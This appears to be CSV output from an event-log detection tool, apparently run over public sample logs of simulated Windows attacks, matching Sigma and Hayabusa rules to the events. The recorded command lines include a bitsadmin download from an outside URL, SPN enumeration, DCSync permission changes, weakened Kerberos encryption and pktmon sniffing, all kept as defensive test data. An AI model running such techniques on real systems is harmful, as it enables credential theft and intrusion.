2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx
2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx
2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx
2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
